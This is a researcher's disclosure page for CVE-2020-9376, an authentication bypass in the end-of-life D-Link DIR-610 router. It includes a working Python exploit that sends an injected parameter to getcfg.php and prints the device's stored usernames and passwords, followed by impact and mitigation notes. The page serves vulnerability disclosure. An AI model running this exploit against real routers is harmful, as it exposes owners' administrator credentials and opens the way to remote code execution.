Heitor Gouvêa

Research About


CVE-2020-9376 - Authentication bypass on D-LINK 610 Router

Summary

DIR-610 é um roteador que foi desenvolvido e vendido pela DLINK e foi distribuído na América Central e na América do Sul. Um atacante pode utilizar a CVE-2020-9376 & CVE-2020-9377 para burlar o mecanismo de autenticação desse aparelho e conseguir acesso ao painel de administração desse roteador, permitindo que o mesmo execute de forma arbitrária códigos diretamente no sistema operacional do mesmo.


Description


Exploit

#!/usr/bin/python

import xml.etree.ElementTree as ET
import urllib2
import sys

def main(host, port):
    content = urllib2.urlopen('http://%s:%s/getcfg.php' % (host, port), 'SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1').read()
    root = ET.fromstring(content)

    for user in root.findall('./module/device/account/entry'):
        name = user.findall('./name')[0].text
        password = user.findall('./password')[0].text

        print 'User: %s\\\\nPassword: %s\\\\n\\\\n' % (name, password)

if __name__ == '__main__':
   [host, port] = sys.argv[1:3]
   main(host, port)

Impact

An attacker can circumvent the authentication mechanisms of this device and gain access to the administration panel and also to restricted information, such as the users and passwords present on the device, later on, they can exploit the CVE-2020-9377 vulnerability of RCE.


Mitigation

While D-Link is aware of vulnerabilities involving DIR-610, these products have reached End of Life (EoL)/End of Support (EoS) and there is no extended support or development for them. D-Link will not be able to resolve device or firmware issues as all development and customer support has ceased.

The DIR-610 Rev. Ax reached its End of Support Date in 2014, it is no longer supported and firmware development has stopped, all consumers still using the product should retire it and immediately replace the device.


Conclusion


References

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
  2. https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
  3. https://www.dlink.com.br/produto/dir-610/
  4. https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A2-Broken_Authentication
  5. https://portswigger.net/web-security/authentication